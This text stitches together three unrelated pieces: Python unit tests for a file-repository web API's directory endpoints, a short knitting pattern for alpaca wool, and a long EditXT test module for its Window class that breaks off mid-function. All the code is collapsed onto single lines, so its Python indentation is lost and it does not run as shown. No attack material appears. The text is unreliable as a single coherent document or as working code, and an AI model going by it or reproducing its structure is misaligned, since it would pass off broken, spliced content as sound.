self.assertHasLen(dirents, 1) for dirent in dirents: self.assertIsNotNone(dirent['id']) self.assertIsNotNone(dirent['name']) self.assertEqual(dirent['type'], 'dir') def test_only_list_file(self): with self.get_tmp_repo() as repo: self.create_file(repo) self.create_dir(repo) dirents = self.get(repo.dir_url + '?t=f').json() self.assertHasLen(dirents, 1) for dirent in dirents: self.assertIsNotNone(dirent['id']) self.assertIsNotNone(dirent['name']) self.assertIsNotNone(dirent['size']) self.assertEqual(dirent['type'], 'file') def test_list_dir_and_file(self): with self.get_tmp_repo() as repo: self.create_file(repo) self.create_dir(repo) dirents = self.get(repo.dir_url).json() self.assertHasLen(dirents, 2) for dirent in dirents: self.assertIsNotNone(dirent['id']) self.assertIsNotNone(dirent['name']) self.assertIn(dirent['type'], ('file', 'dir')) if dirent['type'] == 'file': self.assertIsNotNone(dirent['size']) def test_list_recursive_dir(self): with self.get_tmp_repo() as repo: # create test dir data = {'operation': 'mkdir'} dir_list = ['/1/', '/1/2/', '/1/2/3/', '/4/', '/4/5/', '/6/'] for dpath in dir_list: durl = repo.get_dirpath_url(dpath) self.post(durl, data=data, expected=201) # get recursive dir dirents = self.get(repo.dir_url + '?t=d&recursive=1').json() self.assertHasLen(dirents, len(dir_list)) for dirent in dirents: self.assertIsNotNone(dirent['id']) self.assertEqual(dirent['type'], 'dir') full_path = posixpath.join(dirent['parent_dir'], dirent['name']) + '/' self.assertIn(full_path, dir_list) def test_remove_dir(self): with self.get_tmp_repo() as repo: _, durl = self.create_dir(repo) res = self.delete(durl) self.assertEqual(res.text, u'"success"') self.get(durl, expected=404) def test_download_dir(self): with self.get_tmp_repo() as repo: dpath, _ = self.create_dir(repo) query = '?p=%s' % quote(dpath) ddurl = urljoin(repo.dir_url, 'download') + query res = self.get(ddurl) self.assertRegexpMatches(res.text, r'"http(.*)/files/[^/]+/%s"' % quote(dpath[1:])) @pytest.mark.xfail def test_create_dir_with_parents(self): with self.get_tmp_repo() as repo: path = u'/level1/level 2/level_3/目录4' self.create_dir_with_parents(repo, path) def create_dir_with_parents(self, repo, path): data = {'operation': 'mkdir', 'create_parents': 'true'} durl = repo.get_dirpath_url(path.encode('utf-8')) self.post(durl, data=data, expected=201) curpath = '' # check the parents are created along the way parts = path.split('/') for i, name in enumerate(parts): curpath += '/' + name url = repo.get_dirpath_url(curpath.encode('utf-8')) if i < len(parts) - 1: assert self.get(url).json()[0]['name'] == parts[i+1] else: assert self.get(url).json() == []
Materials: 2 x 100g balls of DK Homefield Alpaca Wool, 4.5mm needles, Darning Needle. Tension: Knit a tension square to check measurements and alter if necessary. Method P = purl, K = knit, (Twist 2 = knit back of 2nd stitch then front of 1st stitch). Row 1: P2, K2, all along the row. Row 2: K2, P2, all along the row. Row 3: P2, T2, all along the row. Cast off (leaving sufficient yarn to sew up), with right sides together sew ends together using your darning needle and yarn.
# -*- coding: utf-8 -*- # EditXT # Copyright 2007-2013 Daniel Miller <[email protected]> # # This file is part of EditXT, a programmer's text editor for Mac OS X, # which can be found at http://editxt.org/. # # EditXT is free software: you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by # the Free Software Foundation, either version 3 of the License, or # (at your option) any later version. # # EditXT is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License # along with EditXT. If not, see <http://www.gnu.org/licenses/>. import logging import os import re from collections import defaultdict from functools import partial import AppKit as ak import Foundation as fn from mocker import Mocker, ANY from testil import eq_ import editxt.constants as const from editxt.window import WindowController, Window from editxt.document import DocumentController, TextDocument from editxt.editor import Editor from editxt.platform.kvo import proxy_target from editxt.project import Project from editxt.test.noseplugins import slow_skip from editxt.util import representedObject from editxt.test.util import (do_method_pass_through, gentest, make_dirty, TestConfig, Regex, replattr, tempdir, test_app) import editxt.window as mod log = logging.getLogger(__name__) # log.debug("""TODO test # Window.iter_dropped_paths # Window.iter_dropped_id_list # """) # ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ # Window tests # log.debug("""TODO implement # """) def test_WindowConroller__init__(): @test_app def test(app, args): ed = Window(app, **args) assert len(ed.projects) == 0 assert len(ed.recent) == 0 assert ed.wc is not None if args: assert ed.state is args["state"] eq_(ed.command.window, ed) c = TestConfig() yield test, {} yield test, {"state": "<state data>"} def test_window_did_load(): @test_app def test(app, state): import editxt.platform.views as cells from editxt.window import BUTTON_STATE_SELECTED from editxt.util import load_image m = Mocker() ed = Window(app, state) wc = ed.wc = m.mock(WindowController) _setstate = m.method(ed._setstate) new_project = m.method(ed.new_project) load_image_cache = {} _load_image = m.mock() def load_image(name): try: img = load_image_cache[name] _load_image(name) except KeyError: img = load_image_cache[name] = m.mock() _load_image(name) >> img return img wc.docsView.setRefusesFirstResponder_(True) wc.docsView.default_menu = ed.menu wc.docsView.registerForDraggedTypes_( [const.DOC_ID_LIST_PBOARD_TYPE, ak.NSFilenamesPboardType]) wc.plusButton.setRefusesFirstResponder_(True) wc.plusButton.setImage_(load_image(const.PLUS_BUTTON_IMAGE)) wc.propsViewButton.setRefusesFirstResponder_(True) wc.propsViewButton.setImage_(load_image(const.PROPS_DOWN_BUTTON_IMAGE)) wc.propsViewButton.setAlternateImage_(load_image(const.PROPS_UP_BUTTON_IMAGE)) _setstate(state) if state: ed.projects = [m.mock(Project)] else: new_project() with replattr(mod, 'load_image', load_image), m: ed.window_did_load() eq_(len(ed.projects), (1 if state else 0)) assert ed._state is None #assert ed.window_settings == "<settings>" yield test, None yield test, "<serial data>" def test__setstate(): from itertools import count from editxt.util import RecentItemStack keygen = count() class Item(dict): def __init__(self, **kwargs): self["id"] = next(keygen) self.update(kwargs) @property def proxy(self): return self @property def _target(self): return self def __getattr__(self, name): try: return self[name] except KeyError: raise AttributeError(name) @test_app def test(app, data): m = Mocker() ed = Window(app) ed.wc = m.mock(WindowController) ed.suspend_recent_updates = m.method(ed.suspend_recent_updates) project_class = m.replace(mod, 'Project') ed.recent = m.mock(RecentItemStack) ws = m.property(ed, 'window_settings') projects = [] if data: for serial in data.get("projects", data.get("project_serials", [])): proj = project_class(ed, serial=serial) >> Item() projects.append(proj) for pi, di in data.get("recent_items", []): if pi < 1: while len(ed.projects) <= pi: docs = [] proj = Item(editors=docs) projects.append(proj) ed.projects.append(proj) proj = ed.projects[pi] if di == "<project>": ed.recent.push(proj.id) else: if di < 2: while len(proj.editors) <= di: proj.editors.append(Item()) ed.recent.push(docs[di].id) @mod.contextmanager def focus(): yield ed.suspend_recent_updates() >> focus() if 'window_settings' in data: ws.value = data['window_settings'] with m: ed._setstate(data) eq_(list(ed.projects), projects) yield test, None yield test, dict() yield test, dict(projects=["<serial>"]) yield test, dict(project_serials=["<serial>"]) # legacy yield test, dict(recent_items=[[0, 2], [0, 0], [0, "<project>"], [0, 1], [1, 0]]) yield test, dict(window_settings="<window_settings>") def test_state(): @test_app def test(app, c): m = Mocker() def exists(path): return True ed = Window(app) ed.projects = projs = [] ed.recent = c.recent m.property(ed, 'window_settings').value >> '<settings>' psets = [] items = {} for i, p in enumerate(c.projs): proj = m.mock(Project) projs.append(proj) pserial = proj.serialize() >> ("proj_%i" % p.id) psets.append(pserial) # setup for recent items proj.id >> p.id items[p.id] = [i, "<project>"] docs = proj.editors >> [] for j, d in enumerate(p.docs): editor = m.mock(Editor) docs.append(editor) editor.id >> d items[d] = [i, j] rits = [items[ri] for ri in c.recent if ri in items] data = {'window_settings': '<settings>'} if psets: data["projects"] = psets if rits: data["recent_items"] = rits with replattr(os.path, 'exists', exists), m: eq_(ed.state, data) c = TestConfig(window='<settings>') p = lambda ident, docs=(), **kw:TestConfig(id=ident, docs=docs, **kw) yield test, c(projs=[], recent=[]) yield test, c(projs=[p(42)], recent=[42]) yield test, c(projs=[p(42, docs=[35])], recent=[35, 42]) yield test, c(projs=[p(42, docs=[-32, 35])], recent=[35, 42]) def test_discard(): from editxt.util import RecentItemStack @test_app def test(app, c): m = Mocker() ed = Window(app) ed.wc = m.mock(WindowController) (ed.wc.selected_items << []).count(2) ed.projects = projs = [] ed.recent = m.mock(RecentItemStack) app = m.replace(ed, 'app') new_current_editor = None cv = m.property(ed, "current_editor") @mod.contextmanager def suspend(): yield m.method(ed.suspend_recent_updates)(True) >> suspend() lookup = {} for p in c.hier: proj = m.mock(Project) proj.id >> p.id docs = [] for d in p.docs: dv = m.mock(Editor) dv.id >> d.id docs.append(dv) if c.id in (p.id, d.id): ed.recent.discard(d.id) dv.project >> proj dv.close() else: lookup[d.id] = dv proj.editors >> docs if p.id == c.id: ed.recent.discard(p.id) proj.close() else: lookup[p.id] = proj projs.append(proj) item = m.mock() item.id >> c.id with m: ed.discard(item) item = lambda i, **kw: TestConfig(id=i, **kw) c = TestConfig(id=2, recent=[], hier=[ # hierarchy of items in the window item(0, docs=[item(1), item(2), item(3)]), item(4, docs=[item(5), item(6), item(7)]), item(8, docs=[item(9), item(12), item(13)]), ]) yield test, c(id=42, hier=[]) yield test, c(id=42) yield test, c yield test, c(recent=[0, 10]) yield test, c(recent=[10, 0]) yield test, c(recent=[20, 2]) yield test, c(recent=[2, 20]) yield test, c(id=0, recent=[0, 10, 2, 1, 3, 5, 7]) def test_get_current_editor(): with test_app() as app: ed = Window(app) obj = object() ed._current_editor = obj eq_(ed.current_editor, obj) def test_set_current_editor(): from editxt.util import RecentItemStack @test_app def test(app, c): m = Mocker() window = Window(app) wc = window.wc = m.mock(WindowController) insert_items = m.method(window.insert_items) window.recent = m.mock(RecentItemStack) find_project_with_editor = m.method(window.find_project_with_editor) editor = (None if c.editor_class is None else m.mock(c.editor_class)) if c.editor_class is None: assert editor is None, editor wc.setup_current_editor(None) wc.selected_items = [] else: wc.is_current_view(editor.main_view >> "view") >> c.editor_is_current if c.editor_is_current: editor.focus() else: window.recent.push(editor.id >> m.mock()) setup = c.editor_class is Editor and not c.view_is_main wc.setup_current_editor(editor) >> setup if setup: if c.proj_is_none: find_project_with_editor(editor) >> None insert_items([editor]) else: find_project_with_editor(editor) >> m.mock(Project) wc.selected_items >> [] wc.selected_items = [editor] with m: window.current_editor = editor c = TestConfig(editor_is_current=False, editor_class=Editor) yield test, c(editor_is_current=True) yield test, c(editor_class=None) for is_main in (True, False): for no_project in (True, False): yield test, c(view_is_main=is_main, proj_is_none=no_project) yield test, c(editor_class=Project) yield test, c(editor_class=Project, editor_is_current=True) def test_selected_editor_changed(): @test_app def test(app, c): m = Mocker() ed = Window(app) ed.wc = wc = m.mock(WindowController) cv = m.property(ed, "current_editor") sel = [m.mock() for x in range(c.numsel)] wc.selected_items >> sel if sel: if c.is_current_selected: cv.value >> sel[0] else: cv.value >> m.mock() cv.value = sel[0] with m: ed.selected_editor_changed() c = TestConfig(numsel=0) yield test, c for ics in (True, False): yield test, c(numsel=1, is_current_selected=ics) yield test, c(numsel=5, is_current_selected=ics) def test_on_dirty_status_changed(): calls = [] def callback(editor, dirty): calls.append(dirty) with test_app("editor") as app: window = app.windows[0] editor = window.projects[0].editors[0] with replattr(window.wc, "on_dirty_status_changed", callback, sigcheck=False): eq_(calls, []) make_dirty(editor.document) eq_(calls, [True]) assert window.is_dirty editor.undo_manager.savepoint() eq_(calls, [True, False]) assert not window.is_dirty def test_suspend_recent_updates(): def test(c): with test_app(c.init) as app: window = app.windows[0] editor = window.current_editor real = window.recent assert real is not None with window.suspend_recent_updates(): assert window.recent is not real window.recent.push(editor.id + 42) if c.remove: item = test_app(app).get(c.remove) if isinstance(item, Editor): item.project.editors.remove(item) else: item.window.projects.remove(item) eq_(test_app(app).state, c.final) c = TestConfig(remove=None) yield test, c(init="editor*", final="window project editor*") yield test, c(init="editor(1)* editor(2)", final="window project editor(1)* editor(2)") yield test, c(init="editor(1)* editor(2)", remove="editor(1)", final="window project editor(2)*") yield test, c(init="editor(1)* editor(2)", remove="editor(2)", final="window project editor(1)*") yield test, c(init="project(a) editor(1)* project(b) editor(2)", final="window project(b) editor(2)*", remove="project(a)") def test_open_documents(): def test(cfg, prompt, after): with test_app(cfg) as app: window = app.windows[0] window.open_documents() eq_(window.wc.prompts, prompt) eq_(test_app(app).state, "window project" + after) yield test, "window", ["open ~"], "[0] editor[~/file.txt 1]*" yield test, "project*", ["open ~"], " editor[~/file.txt 0]*" yield test, "project* editor", ["open ~"], " editor editor[~/file.txt 0]*" yield test, "project editor*", ["open ~"], " editor editor[~/file.txt 0]*" yield test, "editor(/dir/doc.txt)*", ["open /dir"], " editor(/dir/doc.txt) editor[/dir/file.txt 0]*" yield test, "editor(/cancel/doc.txt)*", ["open /cancel"], " editor(/cancel/doc.txt)*" def test_save_methods(): def test(cfg, save, prompt=False): with test_app(cfg) as app: m = Mocker() window = app.windows[0] current = window.current_editor if save is not None: method = m.method(current.save) if save: method(prompt=prompt) with m: (window.save_as if prompt else window.save)() yield test, "window", None yield test, "project*", False yield test, "project* editor", False yield test, "editor*", True yield test, "editor*", True, True def test_reload_current_document(): def test(cfg, reverted=False): with test_app(cfg) as app: m = Mocker() window = app.windows[0] current = window.current_editor if reverted: m.method(current.document.reload_document)() else: assert getattr(current, "document", None) is None, repr(current) with m: window.reload_current_document() yield test, "window" yield test, "project*" yield test, "project* editor" yield test, "project editor*", True def test_save_document_as(): assert hasattr(Window, "save_document_as") def test_prompt_to_overwrite(): assert hasattr(Window, "prompt_to_overwrite") def test__directory_and_filename(): def test(path, directory, name, mkdir=False): if os.path.isabs(path): path = path.lstrip(os.path.sep) assert not os.path.isabs(path), path with tempdir() as tmp: path = os.path.join(tmp, path) if mkdir: assert not os.path.exists(os.path.dirname(path)), path os.mkdir(os.path.dirname(path)) result = Window._directory_and_filename(path) result = (result[0][len(tmp):] or "/"), result[1] else: result = Window._directory_and_filename(path) eq_(result, (directory, name)) yield test, "file.txt", None, "file.txt" yield test, "/file.txt", "/", "file.txt" yield test, "somedir/file.txt", None, "file.txt" yield test, "/somedir/file.txt", "/", "file.txt" yield test, "/somedir/file.txt", "/somedir", "file.txt", True def test_new_project(): with test_app() as app: m = Mocker() ed = Window(app) m.property(ed, "current_editor").value = ANY m.method(Project.create_editor)() >> m.mock() with m: result = ed.new_project() assert result in ed.projects, ed.projects eq_(list(result.editors), []) eq_(result.window, ed) def test_toggle_properties_pane(): slow_skip() @test_app def test(app, c): m = Mocker() nsanim = m.replace(ak, 'NSViewAnimation') nsdict = m.replace(fn, 'NSDictionary') nsval = m.replace(fn, 'NSValue') nsarr = m.replace(fn, 'NSArray') ed = Window(app) ed.wc = wc = m.mock(WindowController) tree_view = m.mock(ak.NSScrollView); (wc.docsScrollview << tree_view).count(2) prop_view = m.mock(ak.NSView); (wc.propsView << prop_view).count(2, 3) tree_rect = tree_view.frame() >> m.mock(fn.NSRect) prop_rect = prop_view.frame() >> m.mock(fn.NSRect) wc.propsViewButton.state() >> (ak.NSOnState if c.is_on else ak.NSOffState) if c.is_on: prop_rect.size.height >> 10 tree_rect.size.height = (tree_rect.size.height >> 20) + 9 tree_rect.origin.y = prop_rect.origin.y >> 4 prop_rect.size.height = 0.0 else: tree_rect.size.height = (tree_rect.size.height >> 216.0) - 115.0 if c.mid_resize: (prop_rect.size.height << 100.0).count(2) tree_rect.size.height = (tree_rect.size.height >> 100.0) + 99.0 else: prop_rect.size.height >> 0 tree_rect.origin.y = (prop_rect.origin.y >> 0) + 115.0 prop_rect.size.height = 116.0 prop_view.setHidden_(False) resize_tree = nsdict.dictionaryWithObjectsAndKeys_( tree_view, ak.NSViewAnimationTargetKey, (nsval.valueWithRect_(tree_rect) >> m.mock()), ak.NSViewAnimationEndFrameKey, None, ) >> m.mock(fn.NSDictionary) resize_props = nsdict.dictionaryWithObjectsAndKeys_( prop_view, ak.NSViewAnimationTargetKey, (nsval.valueWithRect_(prop_rect) >> m.mock()), ak.NSViewAnimationEndFrameKey, None, ) >> m.mock(fn.NSDictionary) anims = nsarr.arrayWithObjects_(resize_tree, resize_props, None) >> m.mock(fn.NSArray) anim = nsanim.alloc() >> m.mock(ak.NSViewAnimation) anim.initWithViewAnimations_(anims) >> anim anim.setDuration_(0.25) anim.startAnimation() with m: ed.toggle_properties_pane() c = TestConfig() yield test, c(is_on=True) yield test, c(is_on=False, mid_resize=True) yield test, c(is_on=False, mid_resize=False) def test_find_project_with_editor(): with test_app() as app: ed = Window(app) doc = app.document_with_path(None) proj = Project(ed) dv = Editor(proj, document=doc) proj.insert_items([dv]) assert dv.document is doc ed.projects.append(proj) eq_(ed.find_project_with_editor(dv), proj) dv = object() eq_(ed.find_project_with_editor(dv), None) def test_find_project_with_path(): @test_app def test(app, c): m = Mocker() def exists(path): return True def samefile(f1, f2): eq_(f2, c.path) return f1 == f2 ed = Window(app) ed.projects = projects = [] found_proj = None for path in c.paths: proj = m.mock(Project) projects.append(proj) if found_proj is None: proj.file_path >> path if path is None: continue if path == c.path: found_proj = proj with replattr( (os.path, 'exists', exists), (os.path, 'samefile', samefile), ), m: result = ed.find_project_with_path(c.path) eq_(result, found_proj) def path(i): return "/path/to/proj_%s.%s" % (i, const.PROJECT_EXT) c = TestConfig(path=path(1), paths=[]) yield test, c yield test, c(paths=[None]) yield test, c(paths=[path(1)]) yield test, c(paths=[path(0), path(1)]) yield test, c(paths=[path(0), path(1), path(2), path(1)]) def test_get_current_project(): def test(cfg, index, create=False, after=None): args = {"create": True} if create else {} with test_app(cfg) as app: window = app.windows[0] result = window.get_current_project(**args) eq_(test_app(app).state, after or cfg) if index is None: eq_(result, None) else: eq_(result, window.projects[index]) yield test, "window", None yield test, "window", 0, True, "window project[0]" yield test, "window project", 0 yield test, "window project* project", 0 yield test, "window project project*", 1 yield test, "window project -project*", 1 yield test, "window project project editor*", 1 yield test, "window project editor project editor", 0 yield test, "window -project editor project editor", 1 def test_Window_iter_editors_of_document(): DOC = "the document we're looking for" @test_app def test(app, config, total_editors): ed = Window(app) m = Mocker() editors = [] doc = m.mock(TextDocument) ed.projects = projs = [] for proj_has_editor in config: proj = m.mock(Project) projs.append(proj) dv = (m.mock(Editor) if proj_has_editor else None) proj.iter_editors_of_document(doc) >> ([] if dv is None else [dv]) if dv is not None: editors.append(dv) with m: result = list(ed.iter_editors_of_document(doc)) eq_(result, editors) eq_(len(result), total_editors) yield test, [], 0 yield test, [False], 0 yield test, [True], 1 yield test, [False, True, True, False, True], 3 def test_tool_tip_for_item(): def test(doctype, null_path): m = Mocker() view = m.mock(ak.NSOutlineView) if doctype is not None: tip = "test_tip" doc = m.mock(doctype) (doc.file_path << (None if null_path else tip)).count(1, 2) else: tip = doc = None item = m.mock() view.realItemForOpaqueItem_(item) >> doc with m, test_app() as app: ed = Window(app) result_tip = ed.tooltip_for_item(view, item) eq_(result_tip, (None if null_path else tip)) for doctype in (TextDocument, Project, None): yield test, doctype, True yield test, doctype, False def test_should_edit_item(): @test_app def test(app, c): m = Mocker() ed = Window(app) item = m.mock() col = m.mock(ak.NSTableColumn) if (col.isEditable() >> c.col_is_editable): obj = m.mock(Project if c.item_is_project else Editor) if c.item_is_project: obj.can_rename() >> c.can_rename representedObject(item) >> obj with m: result = ed.should_edit_item(col, item) eq_(result, c.result) c = TestConfig(col_is_editable=True, item_is_project=True, result=False) yield test, c(col_is_editable=False) yield test, c(item_is_project=False) yield test, c(can_rename=False) yield test, c(can_rename=True, result=True) def test_copy_path(): pasteboard = mod.Pasteboard() @gentest def test(index, text, config="editor(a) editor(b)*"): with test_app(config) as app: window = app.windows[0] item = [editor for project in window.projects for editor in project.editors][index] window.copy_path(item) eq_(pasteboard.text, text) yield test(0, "a") yield test(1, "b") yield test(0, "a\nc", config="editor(a)* editor(b) editor(c)*") yield test(1, "b", config="editor(a)* editor(b) editor(c)*") def test_close_item(): @gentest def test(index=1, expected="editor(a)*", config="editor(a) editor(b)*"): with test_app(config) as app: window = app.windows[0] item = [editor for project in window.projects for editor in project.editors][index] window.close_item(item) eq_(test_app(app).state, ("window project " + expected).strip()) yield test() yield test(0, "editor(b)*") yield test(0, config="editor(a)* editor(b) editor(c)*", expected="editor(b)*") yield test(2, config="editor(a)* editor(b) editor(c)*", expected="editor(b)*") yield test(config="editor(a)* editor(b) editor(c)*", expected="editor(a)* editor(c)*") def test_window_did_become_key(): @test_app def test(app, c): m = Mocker() ed = Window(app) win = m.mock(ak.NSWindowController) cv = m.property(ed, "current_editor") dv = cv.value >> (m.mock(c.editor_type) if c.has_current else None) if c.has_current and c.editor_type is Editor: dv.document.check_for_external_changes(win) with m: ed.window_did_become_key(win) c = TestConfig(has_current=False, editor_type=Editor) yield test, c yield test, c(has_current=True) yield test, c(has_current=True, editor_type=Project) def test_Window_should_close(): @gentest def test(config, prompts=[], should_close=False, close=True): calls = [] def do_close(): calls.append("close") with test_app(config) as app: window = app.windows[0] for win in app.windows: for project in win.projects: for editor in project.editors: if "/dirty.save" in editor.file_path: test_app(app).set_content(editor) if "dirty" in editor.file_path: make_dirty(editor.document) result = window.should_close(do_close) eq_(window.wc.prompts, prompts) eq_(calls, ["close"] if close and not should_close else []) eq_(result, should_close) yield test("editor", should_close=True) yield test("editor(dirty)", ["close dirty"], close=False) yield test("editor(dirty.save)", ["close dirty.save", "save dirty.save"], close=False) # cancel save yield test("editor(/dirty.save)", ["close dirty.save"]) yield test("editor(/dirty.missing)", ["close dirty.missing"], close=False) yield test("editor(/dirty.dont_save)", ["close dirty.dont_save"]) yield test("editor(dirty) window project editor(dirty)", should_close=True) def test_window_will_close(): @test_app def test(app, window_settings_loaded, num_projects): m = Mocker() ed = Window(app) ed.window_settings_loaded = window_settings_loaded app = m.replace(ed, 'app') with m.order(): app.discard_window(ed) with m: ed.window_will_close() yield test, True, 0 yield test, False, 0 yield test, False, 1 yield test, False, 3 def test_get_window_settings(): @test_app def test(app, c): settings = dict( frame_string="<frame string>", splitter_pos="<splitter_pos>", properties_hidden=c.props_hidden, ) m = Mocker() ed = Window(app) ed.wc = m.mock(WindowController) ed.wc.frame_string >> settings["frame_string"] ed.wc.splitter_pos >> settings["splitter_pos"] ed.wc.properties_hidden >> (ak.NSOnState if c.props_hidden else ak.NSOffState) with m: result = ed.window_settings eq_(result, settings) c = TestConfig() yield test, c(props_hidden=True) yield test, c(props_hidden=False) def test_set_window_settings_with_null_settings(): with test_app() as app: ed = Window(app) class FakeWindowController(TestConfig): def __setattr__(self, name, value): self.__dict__[name] = value ed.wc = FakeWindowController() ed.window_settings = {} eq_(ed.wc, FakeWindowController(properties_hidden=False)) def test_set_window_settings(): with test_app() as app: m = Mocker() ed = Window(app) ed.wc = m.mock(WindowController) fs = "<test frame string>" sp = "<test splitter position>" ed.wc.frame_string = fs ed.wc.splitter_pos = sp ed.wc.properties_hidden = True with m: ed.window_settings = dict(frame_string=fs, splitter_pos=sp, properties_hidden=True) def test_close(): @test_app def test(app, c): m = Mocker() ed = Window(app) ed.wc = wc = m.mock(WindowController) ed.projects = [] ed.window_settings_loaded = c.ws_loaded for x in range(3): proj = m.mock(Project) proj.close() ed.projects.append(proj) #wc.docsController.setContent_(None) with m: if not c.wc_is_none: assert ed.wc is not None assert list(ed.projects) ed.close() assert not ed.window_settings_loaded #assert ed.wc is None #assert not list(ed.projects) c = TestConfig(wc_is_none=False) yield test, c(wc_is_none=True, ws_loaded=False) for wsl in (True, False): yield test, c(ws_loaded=wsl) # drag/drop tests ~~~~~~~~~~~~~~~~~~~~~~~ def test_is_project_drag(): @test_app def test(app, c): m = Mocker() ed = Window(app) ed.iter_dropped_id_list = m.method(ed.iter_dropped_id_list) pb = m.mock(ak.NSPasteboard) result_items = [] info = m.mock() #NSDraggingInfo items = [] pb = info.draggingPasteboard() >> m.mock(ak.NSPasteboard) pb.availableTypeFromArray_(ed.supported_drag_types) >> c.accepted_type if c.accepted_type == const.DOC_ID_LIST_PBOARD_TYPE: id_list = pb.propertyListForType_(const.DOC_ID_LIST_PBOARD_TYPE) >> m.mock() ed.iter_dropped_id_list(id_list) >> items factories = dict( p=(lambda:m.mock(Project)), d=(lambda:m.mock(Editor)), ) elif c.accepted_type == ak.NSFilenamesPboardType: pb.propertyListForType_(ak.NSFilenamesPboardType) >> items factories = dict( p=(lambda:"/path/to/project." + const.PROJECT_EXT), d=(lambda:"/path/to/document.txt"), ) else: factories = None if factories is not None: for it in c.items: items.append(factories[it]()) with m: result = ed.is_project_drag(info) eq_(result, c.result) c = TestConfig(result=False) yield test, c(items="", accepted_type="unknown type") for atype in (const.DOC_ID_LIST_PBOARD_TYPE, ak.NSFilenamesPboardType): for items in ("d", "p", "pdp", "ppp"): result = not items.replace("p", "") yield test, c(items=items, accepted_type=atype, result=result) def test_get_id_path_pairs(): @gentest def test(config, indices, path_info): def getitem(index): item = window.projects[index[0]] if len(index) > 1: item = item.editors[index[1]] if item.document.has_real_path(): assert item.file_path.startswith(tmp), item.file_path with open(item.file_path, "w") as fh: pass assert len(index) < 3, index return item with test_app(config) as app: tmp = test_app(app).tmp + os.path.sep window = app.windows[0] items = [getitem(i) for i in indices] result = app.windows[0].get_id_path_pairs(items) eq_(len(result), len(items)) eq_(len(result), len(path_info)) for item, has_path, pair in zip(items, path_info, result): eq_(pair[0], item.id, item) eq_(pair[1], item.file_path if has_path else None) yield test("project", [[0]], [False]) yield test("project editor", [[0, 0]], [False]) yield test("project editor(/file.txt)", [[0, 0]], [True]) def test_validate_drop(): @test_app def test(app, config): m = Mocker() ed = Window(app) ed.wc = m.mock(WindowController) ov = m.mock(ak.NSOutlineView) # TODO investigate where NSDraggingInfo went during the upgrade to 10.5 info = m.mock() #NSDraggingInfo) item = m.mock() index = 0 ed.is_project_drag = m.method(ed.is_project_drag) ed.is_project_drag(info) >> config.is_proj if config.is_proj: if not config.item_is_none: obj = "<item.observedObject>" representedObject(item) >> obj if config.path_is_none: path = None else: path = m.mock(fn.NSIndexPath) path.indexAtPosition_(0) >> config.path_index ov.setDropItem_dropChildIndex_(None, config.path_index) ed.wc.docsController.indexPathForObject_(obj) >> path else: item = None index = config.index if index < 0: ed.projects = ["<proj>"] * config.num_projs ov.setDropItem_dropChildIndex_(None, config.num_projs) else: drop = True if not config.item_is_none: if config.item_is_proj: index = config.index obj = m.mock(type=Project) if index < 0: obj.editors >> (["<doc>"] * config.proj_docs) ov.setDropItem_dropChildIndex_(item, config.proj_docs) else: obj = m.mock(type=Editor) drop = False representedObject(item) >> obj else: item = None index = config.index if config.index < 0: ed.projects = ["<proj>"] * (config.last_proj_index + 1) if config.last_proj_index > -1: path = fn.NSIndexPath.indexPathWithIndex_(config.last_proj_index) proj = m.mock(Project) node = m.mock() ed.wc.docsController.nodeAtArrangedIndexPath_(path) >> node representedObject(node) >> proj proj.editors >> (["<doc>"] * config.proj_docs) ov.setDropItem_dropChildIndex_(node, config.proj_docs) else: ov.setDropItem_dropChildIndex_(None, -1) elif index == 0: drop = False if drop: info.draggingSourceOperationMask() >> ak.NSDragOperationGeneric with m: result = ed.validate_drop(ov, info, item, index) eq_(result, config.result) cfg = TestConfig(is_proj=True, item_is_none=False, result=ak.NSDragOperationMove) for i in (-1, 0, 1, 2): yield test, cfg(item_is_none=True, index=i, num_projs=2) yield test, cfg(path_is_none=True, result=ak.NSDragOperationNone) for p in (0, 1, 2): yield test, cfg(path_is_none=False, path_index=p) cfg = cfg(is_proj=False, result=ak.NSDragOperationGeneric) for i in (-1, 0, 2): yield test, cfg(item_is_proj=True, index=i, proj_docs=2) yield test, cfg(item_is_proj=False, result=ak.NSDragOperationNone) cfg = cfg(item_is_none=True) yield test, cfg(index=-1, last_proj_index=-1) yield test, cfg(index=-1, last_proj_index=0, proj_docs=0) yield test, cfg(index=-1, last_proj_index=0, proj_docs=2) yield test, cfg(index=-1, last_proj_index=2, proj_docs=2) yield test, cfg(index=0, result=ak.NSDragOperationNone) yield test, cfg(index=1) yield test, cfg(index=2) def test_accept_drop(): @test_app def test(app, c): m = Mocker() ed = Window(app) ed.wc = m.mock(WindowController) ed.insert_items = m.method(ed.insert_items) ed.iter_dropped_id_list = m.method(ed.iter_dropped_id_list) ed.iter_dropped_paths = m.method(ed.iter_dropped_paths) ov = m.mock(ak.NSOutlineView) # TODO investigate where NSDraggingInfo went during the upgrade to 10.5 parent = None if c.item_is_none else m.mock() index = 0 items = m.mock() pb = m.mock(ak.NSPasteboard) pb.availableTypeFromArray_(ed.supported_drag_types) >> c.accepted_type if c.accepted_type == const.DOC_ID_LIST_PBOARD_TYPE: id_list = pb.propertyListForType_(const.DOC_ID_LIST_PBOARD_TYPE) >> m.mock() ed.iter_dropped_id_list(id_list) >> items act = c.act elif c.accepted_type == ak.NSFilenamesPboardType: act = None paths = pb.propertyListForType_(ak.NSFilenamesPboardType) >> m.mock() items = ed.iter_dropped_paths(paths) >> items else: items = None assert c.accepted_type is None if items is not None: ed.insert_items(items, parent, index, act) >> c.result with m: result = ed.accept_drop(ov, pb, parent, index, c.act) eq_(result, c.result) c = TestConfig(result=True, item_is_none=False, act=None) yield test, c(accepted_type=const.DOC_ID_LIST_PBOARD_TYPE) yield test, c(accepted_type=const.DOC_ID_LIST_PBOARD_TYPE, act=const.COPY) yield test, c(accepted_type=const.DOC_ID_LIST_PBOARD_TYPE, act=const.MOVE) yield test, c(accepted_type=ak.NSFilenamesPboardType) yield test, c(accepted_type=ak.NSFilenamesPboardType, item_is_none=True) yield test, c(accepted_type=None, result=False) def test_iter_dropped_id_list(): @test_app def test(app, c): m = Mocker() ed = Window(app, None) app = m.replace(ed, 'app') result_items = [] if c.has_ids: ids = [] for it in c.ids: ids.append(it.id) item = m.mock() app.find_item_with_id(it.id) >> (item if it.found else None) if it.found: result_items.append(item) else: ids = None with m: 